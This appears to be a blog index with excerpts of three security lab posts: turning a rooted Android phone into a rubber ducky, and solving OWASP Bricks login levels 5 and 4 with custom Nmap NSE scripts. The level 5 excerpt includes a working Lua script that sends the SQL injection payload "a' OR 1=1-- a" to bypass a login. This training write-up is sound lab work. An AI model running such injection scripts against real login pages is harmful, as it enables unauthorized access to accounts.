Prerequisite a physical android devices rooted termux app As mentioned, the android devices must be rooted in order to work like a rubber ducky. I’ll be using my old devices that I have rooted as demonstration purposes. Here’s a quick evidence that my devices is rooted. Setting up Now that the android devices is rooted, I’ll need to download some useful files and application that has been created by others ...
Challenge Information OWASP Bricks Docker version: here This is a series where I will write my own Nmap NSE script to solve that challenge. This is actually a task given by masta ghimau during MCC 2023. Challenge Solution Login level 5 is just a simple SQL injection which will convert password into md5 hash. We could easily overcome it by injecting in username field. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 local http = require "http" local shortport = require "shortport" portrule = shortport.http action = function(host,port) local resp,final,query r={} r['username']="a' OR 1=1-- a" r['passwd']="test" r['submit']="Submit" resp = http.post(host,port,"/login-5/index.php",nil,nil,r) final = string.match(resp.body, '<p>.*alert%-box.->(.-)<a.*</p>') query = string.match(resp.body, ".*SQL Query(.*)<a.*</div>") return {payload = r ,SQLQuery = query , result = final} end This code is built based on http-title.nse. ...
Challenge Information OWASP Bricks Docker version: here This is a series where I will write my own Nmap NSE script to solve that challenge. This is actually a task given by masta ghimau during MCC 2023. Challenge Solution Login level 4 is just a SQL injection with bracket and uses double quote. Here’s an example: SQL Query: SELECT * FROM users WHERE name=("a") and password=("a"). We could just modify previous NSE script by changing the query. ...